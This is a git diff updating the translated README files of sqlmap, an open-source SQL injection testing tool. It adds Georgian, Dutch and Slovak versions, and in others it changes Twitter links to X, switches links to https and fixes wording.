[![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。 強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。 
@@ -21,21 +21,21 @@ wikiに載っているいくつかの機能のデモをスクリーンショッ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 +sqlmapは、 [Python](https://www.python.org/download/) バージョン **2.6**, **2.7** または **3.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。 -使用法 +使用方法 ---- -基本的なオプションとスイッチの使用法をリストするには: +基本的なオプションとスイッチの使用方法をリストで取得するには: python sqlmap.py -h -全てのオプションとスイッチの使用法をリストするには: +全てのオプションとスイッチの使用方法をリストで取得するには: python sqlmap.py -hh 実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。 -sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 +sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用方法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。 リンク ---- @@ -46,6 +46,6 @@ sqlmapの概要、機能の一覧、全てのオプションやスイッチの * 課題管理: https://github.com/sqlmapproject/sqlmap/issues * ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki * よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* デモ: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ka-GE.md b/doc/translations/README-ka-GE.md new file mode 100644 index 00000000000..9eb193d1d17 --- /dev/null +++ b/doc/translations/README-ka-GE.md 
@@ -0,0 +1,49 @@
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
+
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
+
+sqlmap არის შეღწევადობის ტესტირებისათვის განკუთვილი ინსტრუმენტი, რომლის კოდიც ღიად არის ხელმისაწვდომი. ინსტრუმენტი ახდენს SQL-ინექციის სისუსტეების აღმოჩენისა, გამოყენების და მონაცემთა ბაზათა სერვერების დაუფლების პროცესების ავტომატიზაციას. იგი აღჭურვილია მძლავრი აღმომჩენი მექანიძმით, შეღწევადობის პროფესიონალი ტესტერისათვის შესაფერისი ბევრი ფუნქციით და სკრიპტების ფართო სპექტრით, რომლებიც შეიძლება გამოყენებულ იქნეს მრავალი მიზნით, მათ შორის: მონაცემთა ბაზიდან მონაცემების შეგროვებისათვის, ძირითად საფაილო სისტემაზე წვდომისათვის და out-of-band კავშირების გზით ოპერაციულ სისტემაში ბრძანებათა შესრულებისათვის.
+
+ეკრანის ანაბეჭდები
+----
+
+![ეკრანის ანაბეჭდი](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+შეგიძლიათ ესტუმროთ [ეკრანის ანაბეჭდთა კოლექციას](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), სადაც დემონსტრირებულია ინსტრუმენტის ზოგიერთი ფუნქცია.
+
+ინსტალაცია
+----
+
+თქვენ შეგიძლიათ უახლესი tar-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/tarball/master) დაწკაპუნებით, ან უახლესი zip-არქივის ჩამოტვირთვა [აქ](https://github.com/sqlmapproject/sqlmap/zipball/master) დაწკაპუნებით. 
+
+ასევე შეგიძლიათ (და სასურველია) sqlmap-ის ჩამოტვირთვა [Git](https://github.com/sqlmapproject/sqlmap)-საცავის (repository) კლონირებით:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap ნებისმიერ პლატფორმაზე მუშაობს [Python](https://www.python.org/download/)-ის **2.6**, **2.7** და **3.x** ვერსიებთან.
+
+გამოყენება
+----
+
+ძირითადი ვარიანტებისა და პარამეტრების ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
+
+ python sqlmap.py -h
+
+ვარიანტებისა და პარამეტრების სრული ჩამონათვალის მისაღებად გამოიყენეთ ბრძანება:
+
+ python sqlmap.py -hh
+
+გამოყენების მარტივი მაგალითი შეგიძლიათ იხილოთ [აქ](https://asciinema.org/a/46601). sqlmap-ის შესაძლებლობათა მიმოხილვის, მხარდაჭერილი ფუნქციონალისა და ყველა ვარიანტის აღწერების მისაღებად გამოყენების მაგალითებთან ერთად, გირჩევთ, იხილოთ [მომხმარებლის სახელმძღვანელო](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+ბმულები
+----
+
+* საწყისი გვერდი: https://sqlmap.org
+* ჩამოტვირთვა: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ან [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS არხი: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* პრობლემებისათვის თვალყურის დევნება: https://github.com/sqlmapproject/sqlmap/issues
+* მომხმარებლის სახელმძღვანელო: https://github.com/sqlmapproject/sqlmap/wiki
+* ხშირად დასმული კითხვები (ხდკ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* დემონსტრაციები: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* ეკრანის ანაბეჭდები: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-ko-KR.md b/doc/translations/README-ko-KR.md
index df959c3ca4f..dd508732dde 100644
--- a/doc/translations/README-ko-KR.md
+++ b/doc/translations/README-ko-KR.md
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장악 프로세스를 자동화 하는 오픈소스 침투 테스팅 도구입니다. 최고의 침투 테스터, 데이터베이스 핑거프린팅 부터 데이터베이스 데이터 읽기, 대역 외 연결을 통한 기반 파일 시스템 접근 및 명령어 실행에 걸치는 광범위한 스위치들을 위한 강력한 탐지 엔진과 다수의 편리한 기능이 탑재되어 있습니다. @@ -20,7 +20,7 @@ sqlmap은 SQL 인젝션 결함 탐지 및 활용, 데이터베이스 서버 장 git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap은 [Python](http://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. +sqlmap은 [Python](https://www.python.org/download/) 버전 **2.6**, **2.7** 그리고 **3.x** 을 통해 모든 플랫폼 위에서 사용 가능합니다. 사용법 ---- 
@@ -45,6 +45,6 @@ sqlmap의 능력, 지원되는 기능과 모든 옵션과 스위치들의 목록 * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * 사용자 매뉴얼: https://github.com/sqlmapproject/sqlmap/wiki * 자주 묻는 질문 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* 트위터: [@sqlmap](https://twitter.com/sqlmap) -* 시연 영상: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* 트위터: [@sqlmap](https://x.com/sqlmap) +* 시연 영상: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * 스크린샷: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-nl-NL.md b/doc/translations/README-nl-NL.md new file mode 100644 index 00000000000..03c4dff3ef9 --- /dev/null +++ b/doc/translations/README-nl-NL.md 
@@ -0,0 +1,50 @@
+# sqlmap ![](https://i.imgur.com/fe85aVR.png)
+
+[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap)
+
+sqlmap is een open source penetratie test tool dat het proces automatiseert van het detecteren en exploiteren van SQL injectie fouten en het overnemen van database servers. Het wordt geleverd met een krachtige detectie-engine, vele niche-functies voor de ultieme penetratietester, en een breed scala aan switches, waaronder database fingerprinting, het overhalen van gegevens uit de database, toegang tot het onderliggende bestandssysteem, en het uitvoeren van commando's op het besturingssysteem via out-of-band verbindingen.
+
+Screenshots
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Je kunt de [collectie met screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) bezoeken voor een demonstratie van sommige functies in the wiki.
+
+Installatie
+----
+
+Je kunt de laatste tarball installeren door [hier](https://github.com/sqlmapproject/sqlmap/tarball/master) te klikken of de laatste zipball door [hier](https://github.com/sqlmapproject/sqlmap/zipball/master) te klikken.
+
+Bij voorkeur, kun je sqlmap downloaden door de [Git](https://github.com/sqlmapproject/sqlmap) repository te clonen:
+
+ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap werkt op alle platformen met de volgende [Python](https://www.python.org/download/) versies: **2.6**, **2.7** en **3.x**. 
+
+Gebruik
+----
+
+Om een lijst van basisopties en switches te krijgen gebruik:
+
+ python sqlmap.py -h
+
+Om een lijst van alle opties en switches te krijgen gebruik:
+
+ python sqlmap.py -hh
+
+Je kunt [hier](https://asciinema.org/a/46601) een proefrun vinden.
+Voor een overzicht van de mogelijkheden van sqlmap, een lijst van ondersteunde functies, en een beschrijving van alle opties en switches, samen met voorbeelden, wordt u aangeraden de [gebruikershandleiding](https://github.com/sqlmapproject/sqlmap/wiki/Usage) te raadplegen.
+
+Links
+----
+
+* Homepage: https://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) of [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Probleem tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Gebruikers handleiding: https://github.com/sqlmapproject/sqlmap/wiki
+* Vaak gestelde vragen (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
diff --git a/doc/translations/README-pl-PL.md b/doc/translations/README-pl-PL.md
index 0cbbfb25eb5..00fdf7b43b9 100644
--- a/doc/translations/README-pl-PL.md
+++ b/doc/translations/README-pl-PL.md
@@ -1,26 +1,26 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) -sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia. 
+sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z niej danych, a nawet pozwalających na dostęp do systemu plików oraz wykonywanie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia. -Zrzuty ekranowe +Zrzuty ekranu ---- ![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) -Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości. +Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrującą na wiki niektóre możliwości. Instalacja ---- -Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). +Najnowsze tarball archiwum jest dostępne po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master). Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap): git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. +do użycia sqlmap potrzebny jest [Python](https://www.python.org/download/) w wersji **2.6**, **2.7** lub **3.x** na dowolnej platformie systemowej. Sposób użycia ---- 
@@ -33,18 +33,18 @@ Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia: python sqlmap.py -hh -Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601). -Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). +Przykładowy wynik działania można znaleźć [tutaj](https://asciinema.org/a/46601). +Aby uzyskać listę wszystkich dostępnych funkcji, parametrów oraz opisów ich działania wraz z przykładami użycia sqlmap zalecamy odwiedzić [instrukcję użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage). Odnośniki ---- * Strona projektu: https://sqlmap.org -* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) +* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) lub [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) * RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues +* Zgłaszanie błędów: https://github.com/sqlmapproject/sqlmap/issues * Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki * Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots +* X: [@sqlmap](https://x.com/sqlmap) +* Dema: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) +* Zrzuty ekranu: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md index 3a707deb111..6fe64ed6a49 100644 
--- a/doc/translations/README-pt-BR.md +++ b/doc/translations/README-pt-BR.md @@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap é uma ferramenta de teste de intrusão, de código aberto, que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de intrusão por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. 
@@ -20,7 +20,7 @@ De preferência, você pode baixar o sqlmap clonando o repositório [Git](https: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. +sqlmap funciona em [Python](https://www.python.org/download/) nas versões **2.6**, **2.7** e **3.x** em todas as plataformas. Como usar ---- @@ -45,6 +45,6 @@ Links * Issue tracker: https://github.com/sqlmapproject/sqlmap/issues * Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki * Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demonstrações: [#1](https://www.youtube.com/user/inquisb/videos) e [#2](https://www.youtube.com/user/stamparm/videos) * Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-rs-RS.md b/doc/translations/README-rs-RS.md index 82ab3bd7677..de0fb2e2f3e 100644 --- a/doc/translations/README-rs-RS.md +++ b/doc/translations/README-rs-RS.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap je alat otvorenog koda namenjen za penetraciono testiranje koji automatizuje proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije i preuzimanje baza podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko uzimanja podataka iz baze, do pristupa zahvaćenom fajl sistemu i izvršavanja komandi na operativnom sistemu korištenjem tzv. "out-of-band" veza. 
@@ -20,7 +20,7 @@ Opciono, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproj git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap radi bez posebnih zahteva korištenjem [Python](http://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. +sqlmap radi bez posebnih zahteva korištenjem [Python](https://www.python.org/download/) verzije **2.6**, **2.7** i/ili **3.x** na bilo kojoj platformi. Korišćenje ---- @@ -45,6 +45,6 @@ Linkovi * Prijava problema: https://github.com/sqlmapproject/sqlmap/issues * Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki * Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Demo: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Slike: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-ru-RUS.md b/doc/translations/README-ru-RU.md similarity index 75% rename from doc/translations/README-ru-RUS.md rename to doc/translations/README-ru-RU.md index 61646886594..c88f532e6b5 100644 --- a/doc/translations/README-ru-RUS.md +++ b/doc/translations/README-ru-RU.md 
@@ -1,6 +1,6 @@ -# sqlmap +# sqlmap ![](https://i.imgur.com/fe85aVR.png) -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![PyPI version](https://badge.fury.io/py/sqlmap.svg)](https://badge.fury.io/py/sqlmap) [![GitHub closed issues](https://img.shields.io/github/issues-closed-raw/sqlmapproject/sqlmap.svg?colorB=ff69b4)](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение. 
@@ -20,7 +20,7 @@ sqlmap - это инструмент для тестирования уязви git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev -sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. +sqlmap работает из коробки с [Python](https://www.python.org/download/) версии **2.6**, **2.7** и **3.x** на любой платформе. Использование ---- @@ -45,6 +45,6 @@ sqlmap работает из коробки с [Python](http://www.python.org/do * Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues * Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki * Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) +* X: [@sqlmap](https://x.com/sqlmap) +* Демки: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos) * Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-sk-SK.md b/doc/translations/README-sk-SK.md new file mode 100644 index 00000000000..0f32c0c4d14 --- /dev/null +++ b/doc/translations/README-sk-SK.md 
@@ -0,0 +1,50 @@ +# sqlmap ![](https://i.imgur.com/fe85aVR.png) + +[![.github/workflows/tests.yml](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml/badge.svg)](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [![Python 2.6|2.7|3.x](https://img.shields.io/badge/python-2.6|2.7|3.x-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [![x](https://img.shields.io/badge/x-@sqlmap-blue.svg)](https://x.com/sqlmap) + +sqlmap je open source nástroj na penetračné testovanie, ktorý automatizuje proces detekovania a využívania chýb SQL injekcie a preberania databázových serverov. Je vybavený výkonným detekčným mechanizmom, mnohými výklenkovými funkciami pre dokonalého penetračného testera a širokou škálou prepínačov vrátane odtlačkov databázy, cez načítanie údajov z databázy, prístup k základnému súborovému systému a vykonávanie príkazov v operačnom systéme prostredníctvom mimopásmových pripojení. + +Snímky obrazovky +---- + +![snímka obrazovky](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) + +Môžete navštíviť [zbierku snímok obrazovky](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), ktorá demonštruuje niektoré funkcie na wiki. + 